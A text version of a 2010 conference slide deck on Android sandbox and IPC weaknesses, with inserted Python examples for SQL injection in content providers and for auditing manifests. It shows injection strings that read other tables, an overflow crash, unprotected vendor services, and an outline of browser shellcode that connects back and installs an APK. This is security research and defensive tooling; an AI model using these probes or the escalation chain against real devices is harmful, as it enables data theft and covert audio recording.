The Risk you carry in your Pocket - Nils - Black Hat Abu Dhabi 2010 (PowerPoint presentation)


SLIDE 1

The Risk you carry in your Pocket Nils Black Hat Abu Dhabi 2010

MWR InfoSecurity

SLIDE 2

Who Am I?

  • Head of Research @ MWR
  • Exploiting stuff before…
  • Microsoft, Google, Adobe, IBM, Mozilla, Sun, Linux, Apple …
  • Pwn2Own Winner 2009
  • Safari, IE and Firefox
  • Pwn2Own Winner 2010
  • Firefox on Windows 7
SLIDE 3
  • Demo
  • Introduction
  • Android Sandbox
  • Android IPC
  • Vulnerabilities
  • Demo
  • Conclusion
  • Q&A


SLIDE 4
  • Demo
  • Introduction
  • Android Sandbox
  • Android IPC
  • Vulnerabilities
  • Demo
  • Conclusion
  • Q&A


SLIDE 5

Introduction

  • Prerequisites:
  • I have got a WebKit vulnerability
  • Can own:
  • iPhone
  • Palm Web OS
  • Android
  • In Android I am limited to the Sandbox
  • Access to Passwords, Cookies, etc…
SLIDE 6

Introduction

  • I want more Privileges
  • Record Audio
SLIDE 7

Introduction

  • Research on Android Phone
  • Not emulator
  • HTC Legend
  • Android 2.1
  • Some apps
SLIDE 8

What will you see?

  • How to:
  • Audit an Android Handset
  • Additions by Vendors
  • And Carriers
  • Audit Android Applications
  • And how to exploit the findings
SLIDE 9

Android – Previous Research

  • Kernel vulnerabilities:
  • E.g. sock_sendpage()
  • Local vulnerabilities:
  • E.g. adb root vulnerability
  • Fork bomb
  • Setuid return value not checked
SLIDE 10
  • Demo
  • Introduction
  • Android Sandbox
  • Android IPC
  • Vulnerabilities
  • Demo
  • Conclusion
  • Q&A


SLIDE 11

Android – Sandbox

  • Applications are Sandboxed
  • Using Linux User/Group model
  • Every Application == 1 User
  • In theory …
  • Communication through IPC
  • Permissions
SLIDE 12

Android – Permissions

  • Applications request Permissions
  • AndroidManifest.xml
  • Pre-installed apps
  • Set-up by default in phone
  • User installed apps
  • Granted by User during installation
  • Limited
SLIDE 13

Android – Permissions

  • Examples:
  • android.permission.CALL_PHONE
  • android.permission.RECORD_AUDIO
  • android.permission.INSTALL_PACKAGE
SLIDE 14
  • Demo
  • Introduction
  • Android Sandbox
  • Android IPC
  • Vulnerabilities
  • Demo
  • Conclusion
  • Q&A


SLIDE 15

Android – IPC

  • Inter-Process Communication
  • Used by all of the Apps
  • Core feature on Android
  • Protected using Permissions
  • Mechanism:
  • Services
  • Content-Providers
  • Broadcasts
  • Activities
SLIDE 16

Android – IPC

  • Supported by /dev/binder
  • Kernel
  • Message routing
  • Permission enforcement
  • Messages in “Parcels”
  • Intents special Parcels
SLIDE 17

Android – Intent

  • Serialised Data Structure
  • Sent to IPC endpoints
  • Contain Extras
  • Strings
  • Primitive Data Types
  • Arrays thereof
  • Serialisable Java Objects (!)
SLIDE 18

Android – Service

  • Similar to RPC
  • Class extends Service.class
  • Public methods are exported
  • Called through Intents
  • Defined in AndroidManifest.xml:

    <service android:name="BluetoothHeadsetService">
        <intent-filter>
            <action android:name="android.bluetooth.IBluetoothHeadset" />
        </intent-filter>
    </service>

SLIDE 19

Android – Activity

  • Visual Components of Applications
  • Application can instantiate them
  • Sometimes
  • Take arguments in Intents
  • Will run in Implementing Process
  • Permissions!
SLIDE 20

Android – Content-Providers

  • Provide Access to any Data
  • Emails
  • Pictures
  • Often backed by SQLite Databases
  • Content-Resolver
  • URI: content://browser/bookmarks
  • Standard Interface using Cursors
  • Write and Read Permissions
  • Not using Intents
SLIDE 21

Android – Broadcast Receivers

  • Register to Broadcast Messages
  • System and Custom
  • Some Messages are protected
  • Others can be forged by anyone
  • Arguments in Broadcasts
  • Intents
  • AndroidManifest.xml
  • Can register dynamically as well
SLIDE 22

Android – Idea

[Diagram: App1, App2 and App3 talking to Service1 and Service2 through the four IPC endpoint types: Service, Content-Provider, Broadcast-Receiver and Activity]

SLIDE 23

Android – IPC Exports

  • Default IPC exports
  • Exported by default
  • Content-Providers
  • Export depends on set Filters
  • Services
  • Broadcast Receivers
  • Activities
  • Developers aware of that?
SLIDE 24

Android – Privilege Escalation

  • Any vulnerability in any exported:
  • Service, Content-Provider
  • Broadcast Receiver or Activity
  • Can lead to privilege Escalation
  • Gaining privileges of vulnerable App
SLIDE 25

Android - Applications

  • Many Apps on the phone
  • All in different Processes (Theoretically)
  • Default Android apps
  • ~ 70 apps
  • Vendor apps
  • HTC: ~ 60 apps
  • Plus carrier apps!
  • User installed apps
  • Many more
SLIDE 26

Android – Processes

  • 1 User  1 App
  • Multiple processes per App
  • Not on real phones though
  • Shared User IDs
  • Across apps
  • Shared processes
  • Across apps
  • => Shared Permissions and Access-rights
SLIDE 27

Android – Shared UIDs

  • Applications can Share UserIds
  • If signed by same Developer Key
  • Or Pre-installed
  • Pro:
  • Performance
  • Contra:
  • Security
SLIDE 28

Android – Shared UIDs

  • Example:
  • com.htc.WeatherWidget
  • Permissions:

android.permission.GET_ACCOUNTS, android.permission.READ_SYNC_SETTINGS

SLIDE 29

Android – Shared UIDs

  • Example:
  • com.htc.WeatherWidget
  • Shares “com.htc.rosie.uid.shared” with:

com.htc.FriendStreamWidget, com.htc.TwitterWidget, com.htc.htcmailwidgets, com.htc.NewsReaderWidget,
com.htc.StockWidget, com.htc.widget.clockwidget, com.htc.htccalendarwidgets, com.htc.footprints.widgets,
com.htc.htccontactwidgets, com.htc.htcmsgwidgets, com.htc.htcsyncwidget, com.htc.launcher,
com.htc.WeatherWidget, com.htc.htcsettingwidgets, com.htc.photo.widgets, com.htc.htcbookmarkwidget,
com.htc.MusicWidget, com.htc.htcsearchwidgets

SLIDE 30

Android – Shared UIDs

  • Example:
  • com.htc.WeatherWidget
  • Permissions:

android.permission.GET_ACCOUNTS, android.permission.READ_SYNC_SETTINGS

SLIDE 31

Android – Shared UIDs

  • Example:
  • com.htc.WeatherWidget
  • Shared Permissions:

android.permission.INTERNET, com.htc.htctwitter.permission.useprovider, android.permission.ACCESS_FINE_LOCATION,
android.permission.ACCESS_NETWORK_STATE, android.permission.ACCESS_WIFI_STATE, android.permission.GET_ACCOUNTS,
android.permission.READ_SYNC_SETTINGS, android.permission.READ_CALENDAR, android.permission.WRITE_CALENDAR,
com.google.android.googleapps.permission.GOOGLE_AUTH.mail, android.permission.READ_CONTACTS,
android.permission.CALL_PHONE, android.permission.CALL_PRIVILEGED, android.permission.READ_SMS,
com.htc.socialnetwork.permission.useprovider, android.permission.RECEIVE_BOOT_COMPLETED,
android.permission.WRITE_CONTACTS, android.permission.RECEIVE_SMS, android.permission.RECEIVE_MMS,
android.permission.SEND_SMS, android.permission.VIBRATE, android.permission.WRITE_SMS,
android.permission.CHANGE_NETWORK_STATE, android.permission.READ_PHONE_STATE, android.permission.WAKE_LOCK,
android.permission.EXPAND_STATUS_BAR, android.permission.GET_TASKS, android.permission.SET_WALLPAPER,
android.permission.SET_WALLPAPER_HINTS, android.permission.WRITE_SETTINGS,
com.htc.launcher.permission.READ_SETTINGS, com.htc.launcher.permission.WRITE_SETTINGS,
android.permission.SET_TIME_ZONE, android.permission.READ_SYNC_STATS, android.permission.WRITE_EXTERNAL_STORAGE,
android.permission.BROADCAST_STICKY, android.permission.WRITE_SECURE_SETTINGS, android.permission.CHANGE_WIFI_STATE,
android.permission.CLEAR_APP_USER_DATA, android.permission.MODIFY_PHONE_STATE,
android.permission.ACCESS_COARSE_LOCATION, android.permission.WRITE_APN_SETTINGS,
android.permission.ACCESS_CHECKIN_PROPERTIES, android.permission.BLUETOOTH, android.permission.BLUETOOTH_ADMIN,
android.permission.ACCESS_WIMAX_STATE, android.permission.CHANGE_WIMAX_STATE,
android.permission.ACCESS_LOCATION_EXTRA_COMMANDS, android.permission.ACCESS_LOCATION,
android.permission.ACCESS_ASSISTED_GPS, android.permission.ACCESS_NETWORK_LOCATION, android.permission.ACCESS_GPS,
com.android.browser.permission.READ_HISTORY_BOOKMARKS, com.android.browser.permission.WRITE_HISTORY_BOOKMARKS

SLIDE 32
  • Demo
  • Introduction
  • Android Sandbox
  • Android IPC
  • Vulnerabilities
  • Demo
  • Conclusion
  • Q&A


SLIDE 33

Android – Vulnerabilities

  • SQL injection in Content Providers
  • When backed by SQLite
  • Allows for arbitrary reads in databases
  • Across processes
  • Can be filtered by Developer
  • Usually is not
  • Not encouraged by Dev Docs
  • Have not found instances of writes to DB
  • No useful functions (load_extension()…)
SLIDE 34

Android – SQL Injection

    final Cursor query(Uri uri, String[] projection, String selection,
                       String[] selectionArgs, String sortOrder);

SLIDE 35

Android – SQL Injection

    final Cursor query("content://settings/system", null, null, null, null);

    SELECT * FROM system;

SLIDE 36

Android – SQL Injection

    final Cursor query("content://settings/system", null, "_id=1", null, null);

    SELECT * FROM system WHERE _id=1;

SLIDE 37

Android – SQL Injection

    final Cursor query("content://settings/system", null,
                       "(select count(*) from secure where name='adb_enabled' and value='0')=0",
                       null, null);

    SELECT * FROM system WHERE (select count(*) from secure where name='adb_enabled' and value='0')=0;

SLIDE 38

Android – SQL Injection

    final Cursor query("content://settings/system", {"_id"}, null, null, null);

    SELECT _id FROM system;

SLIDE 39

Android – SQL Injection

    final Cursor query("content://settings/system", {"* FROM bluetooth_devices;"}, null, null, null);

    SELECT * FROM bluetooth_devices; FROM system;

SLIDE 40

Android – SQL Injection

    final Cursor query("content://settings/system", {"* FROM sqlite_master;"}, null, null, null);

    SELECT * FROM sqlite_master; FROM system;
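Slides 34 to 40 show the same defect from several angles: the projection and selection strings a caller hands to query() are concatenated into the provider's SQL, so a caller can read other tables in the provider's database without holding any permission for them. The following Python stand-in is an added example, not code from the slides or from MWR; it reproduces the string-building step with the sqlite3 module (the Java provider has no runnable counterpart here), using constructed tables named after the ones on the slides, and sets a hardened builder beside it that allow-lists columns and binds the selection value as a parameter. Python's sqlite3 runs one statement per call, so the "; FROM system" trick of slides 39 and 40 is replaced by a subselect in the projection, which reads sqlite_master in a single statement:

```python
import re
import sqlite3

# Constructed stand-in for the settings provider's database. Table names
# (system, secure, bluetooth_devices) follow the slides; the rows are made up.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE system(_id INTEGER PRIMARY KEY, name TEXT, value TEXT);
        CREATE TABLE secure(_id INTEGER PRIMARY KEY, name TEXT, value TEXT);
        CREATE TABLE bluetooth_devices(_id INTEGER PRIMARY KEY, addr TEXT, name TEXT);
        INSERT INTO system VALUES (1, 'volume_ring', '5'), (2, 'screen_brightness', '120');
        INSERT INTO secure VALUES (1, 'adb_enabled', '0');
        INSERT INTO bluetooth_devices VALUES (1, '00:11:22:33:44:55', 'headset');
    """)
    return db

def vulnerable_query(db, table, projection, selection, selection_args):
    """The pattern on the slides: projection and selection strings supplied by the
    calling app are pasted straight into the SQL that runs in the provider's process."""
    cols = ", ".join(projection) if projection else "*"
    sql = f"SELECT {cols} FROM {table}"
    if selection:
        sql += f" WHERE {selection}"
    return sql, db.execute(sql, tuple(selection_args or ())).fetchall()

# Hardened builder: the provider decides which table, which columns and which
# WHERE shapes exist; the caller only supplies values, and those are bound.
ALLOWED_TABLES = {"system"}
ALLOWED_COLUMNS = {"_id", "name", "value"}
SIMPLE_SELECTION = re.compile(r"^\s*(\w+)\s*=\s*\?\s*$")   # only "<column> = ?"

def hardened_query(db, table, projection, selection, selection_args):
    if table not in ALLOWED_TABLES:
        raise ValueError(f"unknown table {table!r}")
    cols = list(projection) if projection else sorted(ALLOWED_COLUMNS)
    unknown = [c for c in cols if c not in ALLOWED_COLUMNS]
    if unknown:
        raise ValueError(f"projection names unknown column(s): {unknown}")
    sql = f"SELECT {', '.join(cols)} FROM {table}"
    params = ()
    if selection:
        m = SIMPLE_SELECTION.match(selection)
        if not m or m.group(1) not in ALLOWED_COLUMNS:
            raise ValueError("selection must have the form '<column> = ?'")
        args = tuple(selection_args or ())
        if len(args) != 1:
            raise ValueError("exactly one selection argument expected")
        sql += f" WHERE {m.group(1)} = ?"
        params = args           # the value travels as a bound parameter, never as SQL text
    return sql, db.execute(sql, params).fetchall()

# Slide 37's boolean probe: rows come back only when adb_enabled is not '0'.
ADB_PROBE = "(select count(*) from secure where name='adb_enabled' and value='0')=0"
# Single-statement variant of slides 39/40 (constructed here): a subselect in the
# projection lists every table in the provider's database.
SCHEMA_PROBE = ["(select group_concat(name) from sqlite_master) AS tables"]

def demo():
    db = make_db()
    results = {}
    # cross-table read through the selection string
    _, rows = vulnerable_query(db, "system", None, ADB_PROBE, None)
    results["adb_probe_rows"] = rows
    # schema enumeration through the projection string
    _, rows = vulnerable_query(db, "system", SCHEMA_PROBE, None, None)
    results["schema_probe_rows"] = rows
    # the same inputs against the hardened builder are rejected...
    results["rejected"] = []
    for proj, sel in ((None, ADB_PROBE), (SCHEMA_PROBE, None)):
        try:
            hardened_query(db, "system", proj, sel, None)
            results["rejected"].append(False)
        except ValueError:
            results["rejected"].append(True)
    # ...while a legitimate lookup still works
    _, rows = hardened_query(db, "system", ["_id", "value"], "name = ?", ["volume_ring"])
    results["legit_rows"] = rows
    return results

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

With adb_enabled set to '0' in the constructed secure table, the slide-37 probe returns no rows against the vulnerable builder (the caller learns the value without reading the table directly), and the projection probe returns one row per system row, each carrying the list of tables. The hardened builder rejects both inputs with a ValueError and still answers a plain "name = ?" lookup; the point is that a content provider must own its SQL grammar rather than accept fragments of it from other processes.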

SLIDE 41

Android – Vulnerabilities

  • Unprotected services
  • Example:
  • Introduced by HTC
  • com.htc.soundrecorder.RecordingService
  • Not protected
  • Explicitly exported
  • android.permission.RECORD_AUDIO
  • Now useless
  • Every HTC Android phone I checked
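Slides 23 and 24 give the export rules (content providers exported by default, services, receivers and activities when they carry an intent-filter or set exported), slides 27 to 31 show how a sharedUserId turns a handful of widget permissions into the union of everything in the group, and slide 41 gives the concrete case of a service that is exported but carries no permission. The manifest audit below is an added example, not from the slides or from MWR: it parses AndroidManifest.xml files with the standard library, computes the effective permission set per shared UID, and lists exported components that no android:permission (or readPermission/writePermission for providers) guards. The two manifests, their package names and component names are constructed for the example; the export rules are the slide-era ones (later Android versions changed the default for providers).

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

ANDROID_NS = "http://schemas.android.com/apk/res/android"

def attr(elem, name):
    """Read an android:* attribute (ElementTree keys it by the full namespace)."""
    return elem.get(f"{{{ANDROID_NS}}}{name}")

def parse_manifest(xml_text):
    root = ET.fromstring(xml_text)
    return {
        "package": root.get("package"),
        "shared_uid": attr(root, "sharedUserId"),
        "permissions": {attr(p, "name") for p in root.findall("uses-permission")},
        "application": root.find("application"),
    }

def effective_permissions(manifests):
    """Union of uses-permission per sharedUserId: every app in the group runs as
    the same Linux user, so each one effectively holds all of them."""
    groups = defaultdict(set)
    for m in manifests:
        key = m["shared_uid"] or m["package"]   # apps without a shared UID stand alone
        groups[key] |= m["permissions"]
    return dict(groups)

def is_exported(component, tag):
    explicit = attr(component, "exported")
    if explicit is not None:
        return explicit == "true"
    if tag == "provider":                      # providers: exported unless told otherwise
        return True
    return component.find("intent-filter") is not None   # others: exported if filtered

def unprotected_exports(manifest):
    """Exported components that no permission guards, as (tag, name) pairs."""
    findings = []
    app = manifest["application"]
    if app is None:
        return findings
    for tag in ("activity", "service", "receiver", "provider"):
        for comp in app.findall(tag):
            if not is_exported(comp, tag):
                continue
            guards = [attr(comp, "permission")]
            if tag == "provider":
                guards += [attr(comp, "readPermission"), attr(comp, "writePermission")]
            if not any(guards):
                findings.append((tag, attr(comp, "name")))
    return findings

def audit(manifest_texts):
    manifests = [parse_manifest(t) for t in manifest_texts]
    return {
        "effective_permissions": effective_permissions(manifests),
        "unprotected_exports": {m["package"]: unprotected_exports(m) for m in manifests},
    }

# Constructed manifests: two apps sharing one UID, one with a provider left at the
# default (exported), the other with an explicitly exported, unguarded service.
WEATHER_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.weatherwidget" android:sharedUserId="com.example.widgets.shared">
  <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
  <uses-permission android:name="android.permission.READ_SYNC_SETTINGS"/>
  <application>
    <provider android:name=".WeatherProvider" android:authorities="com.example.weather"/>
    <activity android:name=".ConfigActivity"/>
  </application>
</manifest>"""

RECORDER_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.soundrecorder" android:sharedUserId="com.example.widgets.shared">
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <application>
    <service android:name=".RecordingService" android:exported="true"/>
    <service android:name=".UploadService"
             android:permission="com.example.soundrecorder.permission.UPLOAD">
      <intent-filter><action android:name="com.example.UPLOAD"/></intent-filter>
    </service>
    <receiver android:name=".BootReceiver">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
  </application>
</manifest>"""

if __name__ == "__main__":
    for section, value in audit([WEATHER_MANIFEST, RECORDER_MANIFEST]).items():
        print(section, value)
```

Run against the two constructed manifests, the weather widget alone asks for two harmless permissions but its shared UID also carries RECORD_AUDIO and SEND_SMS from the recorder app; the audit flags the weather provider (exported by default, no read or write permission), the recorder's RecordingService (exported="true", no permission) and its boot receiver, while UploadService passes because a permission is set. For a handset review the same loop runs over every manifest pulled from /system/app and /data/app.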
SLIDE 42

Android – Native APIs

  • Java less prone to Memory Corruptions
  • Native APIs more promising for Review
  • Services
  • Directly exporting native APIs
  • Keep a look out for:
  • loadLibrary("")
  • And the "native" keyword
SLIDE 43

Android – Native APIs

    char mJetFilePath[256];

    int JetPlayer::loadFromFile(const char* path) {
        …
        // bound taken from the source string, not from sizeof(mJetFilePath):
        // a path longer than the 256-byte buffer is copied past its end
        strncpy(mJetFilePath, path, strlen(path));

    I/DEBUG   (   31): pid: 1257, tid: 1258  >>> com.example.test1 <<<
    I/DEBUG   (   31): signal 11 (SIGSEGV), fault addr 00000000
    I/DEBUG   (   31):  r0 ffffffff  r1 41413000  r2 00000004  r3 ffff0ff0
    I/DEBUG   (   31):  r4 00000000  r5 41413000  r6 afd40328  r7 00000000
    I/DEBUG   (   31):  r8 00100000  r9 80848121  10 10000000  fp 00117808
    I/DEBUG   (   31):  ip afd20209  sp 100ffe20  lr afd20201  pc 80849aa4  cpsr 80000030
    I/DEBUG   (   31):          #00  pc 00049aa4  /system/lib/libdvm.so
    I/DEBUG   (   31):          #01  lr afd20201  /system/lib/libc.so

    // Java side: the path string reaches the native copy unchanged
    public boolean loadJetFile(String path) {
        return native_loadJetFromFile(path);
    }

SLIDE 44

Android – Others

  • Let’s be creative
  • Applications do all kinds of stuff
  • Some of which is stupid :P
  • Example: Skype - App

    # ls -al /data/data/com.skype.raider/files/skypekit
    -rwxrwxrwx  1 0  2000  43 /data/data/com.skype.raider/files/skypekit
SLIDE 45

Android – Others

  • Permissions:

android.permission.DISABLE_KEYGUARD, android.permission.WAKE_LOCK, android.permission.INTERNET,
android.permission.GET_ACCOUNTS, android.permission.READ_CONTACTS, android.permission.ACCESS_NETWORK_STATE,
android.permission.VIBRATE, android.permission.MODIFY_AUDIO_SETTINGS, android.permission.RECORD_AUDIO,
android.permission.READ_PHONE_STATE, android.permission.ACCESS_COARSE_LOCATION, android.permission.GET_TASKS,
android.permission.AUTHENTICATE_ACCOUNTS, android.permission.MANAGE_ACCOUNTS, android.permission.READ_SYNC_SETTINGS,
android.permission.WRITE_SYNC_SETTINGS, android.permission.GET_ACCOUNTS, android.permission.USE_CREDENTIALS,
android.permission.WRITE_SETTINGS, android.permission.WRITE_SECURE_SETTINGS, android.permission.READ_CONTACTS,
android.permission.WRITE_CONTACTS, android.permission.READ_SYNC_STATS, android.permission.WRITE_EXTERNAL_STORAGE

SLIDE 46

Android – Deserialisation

  • Intents contain Extras
  • Can be Serialisable
  • Object type is checked after deserialisation
  • Arbitrary objects can be deserialised
  • In other Processes
  • Across trust boundaries
  • With other permissions
  • Is this exploitable?
  • Sami?
SLIDE 47

SLIDE 48

Android – Permissions

  • Most useful Permission:

INSTALL_PACKAGES

  • On HTC phones granted to the Browser
  • That’s True!
  • Why
  • Flashlite Flash player
  • Installs updates using PackageManager
  • Needs Permissions for that …
SLIDE 49

Android – Permissions

  • INSTALL_PACKAGES in Browser
  • Impact
  • Malicious Code in Browser
  • Installs arbitrary Applications
  • Without prompting the User
  • Gains arbitrary Permissions
  • For malicious applications
  • No restricted permissions
SLIDE 50

Android – Demo

  • That should be enough…

Demo Time!

SLIDE 51
  • Demo
  • Introduction
  • Android Sandbox
  • Android IPC
  • Vulnerabilities
  • Demo
  • Conclusion
  • Q&A


SLIDE 52

Android Demo - Vulnerability

  • Use-after-free in Browser
  • WebKit
  • Android, Chrome, Safari, iPhone, Symbian, Palm Pre and more
  • Allows for arbitrary code execution
  • HTML5
  • Introduced in Android 2.0
  • 1.5 and 1.6 not vulnerable
  • JavaScript
  • Patched in 2.2
  • No NX, No ASLR
SLIDE 53

Android - Use-after-free in Browser

[Diagram: a DOM object holding references to Object 1 and Object 2]

SLIDE 54

Android - Use-after-free in Browser

[Diagram: Object 2 is freed while the DOM object still references it]

SLIDE 55

Android - Use-after-free in Browser

[Diagram: the freed slot of Object 2 is refilled with controlled data]

SLIDE 56

Android - Use-after-free in Browser

[Diagram: the stale reference is used and a call goes through the controlled data, shown as (*data)()]

SLIDE 57

Android - Shellcode

  • Steps:
  • 1. Connect back to Attacker
  • 2. Upload malicious APK
  • 3. Install from Browser
  • 4. Pwnage!
SLIDE 58

Android - Demo

SLIDE 59

SLIDE 60

Android Proof-of-Concept

  • Reported the vulnerability to vendors
  • Patched in 2.2
  • However
  • Any WebKit vulnerability will do
  • Not patched in most Phones
SLIDE 61
  • Demo
  • Introduction
  • Android Sandbox
  • Android IPC
  • Vulnerabilities
  • Demo
  • Conclusion
  • Q&A


SLIDE 62

Conclusion

  • Understand the Threats
  • Android Sandbox
  • Fairly Reasonable
  • Many bugs introduced by:
  • Vendors, Carriers
  • 3rd Party Apps
  • Testing and Assurance
  • For Phones
  • Not just OS
SLIDE 63
  • Demo
  • Introduction
  • Android Sandbox
  • Android IPC
  • Vulnerabilities
  • Demo
  • Conclusion
  • Q&A


SLIDE 64

Questions?